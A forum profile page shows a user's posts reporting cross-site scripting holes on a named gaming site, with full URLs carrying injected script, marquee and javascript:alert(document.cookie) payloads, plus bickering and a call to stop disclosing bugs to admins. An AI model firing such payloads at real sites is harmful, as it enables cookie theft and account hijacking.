Jump to content

source

Members
  • Posts

    100
  • Joined

  • Last visited

    Never

Posts posted by source

  1. http://www.themafiaman.com/tru/board.php?brd=recruit&tru=10

     

    http://www.themafiaman.com/tru/pimp.php?tru=10

     

    both xssable

     

     

    I can't finish cause some stupid fuck face disabled my account.

     

    Anyway this is the LAST time you will see me make a post on these forums. I do not believe you should help admins fix security holes anymore. Open-source/full disclosure is bad. I discourage everyone from doing it.

     

    Agentsteal I hope you read this... Don't waste your time with this helping people fix security anymore. It's a complete waste of time.

     

     

    lolz

  2. first hole is in the register on step three if you put ">code as ur last name hit enter it runs.

     

    http://www.themafiaman.com/signup.php?step=4&email=%22%3E%3Cmarquee%3Elolz&referer=

     

    http://www.themafiaman.com/signup.php?step=%22%3E%3Cscript%3Ealert(1);%3C/script%3E&email=lolwtf@aol.com&referer=

     

    http://themafiaman.com/signup.php?step=3&refer=%22%3E%3Cmarquee%3Elolz

     

    http://themafiaman.com/tru/board.php?tru=10&action=post

    xss in message... and I can make it link to say <a href="javascript:alert(document.cookie)">CLICK HERE</a>

  3. "

    I took the time to look at what you've posted here, and I can't say I'm impressed. Most of it is talking down on noobs, and most of it is not exactly friendly.

     

    Surely this is going to invoke another of your friendly responses, but go ahead, I expect no less.

     

    It's not like you have added ANYTHING of value to this forum. You're just another unfriendly blip on the radar.

    "

     

    I do not talk down to noobs. I hardly ever write anything besides posting exploits in the site itself.

     

    Surely if you did not want another one of my friendly responses you would not have posted, and attempted to troll me.

     

    Now if you say I've added nothing to this forum then you are a complete tard and made a false statement in your first line in saying that you read all of my posts.

     

    Now, stop trolling me.

  4. "Take a couple of breaths before you freak out. If the OP does not care much about XSS (granted that he shouldn't post here and is wasting everybody's time), his loss.

     

    Although I must agree that inserting a marquee is only a tiny exploit. Try stealing a cookie using JavaScript or by loading an external entity (i.e. an image), then he has something to worry about."

     

    {snip}

     

    If you can use <marquee> you can steal cookies.

×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.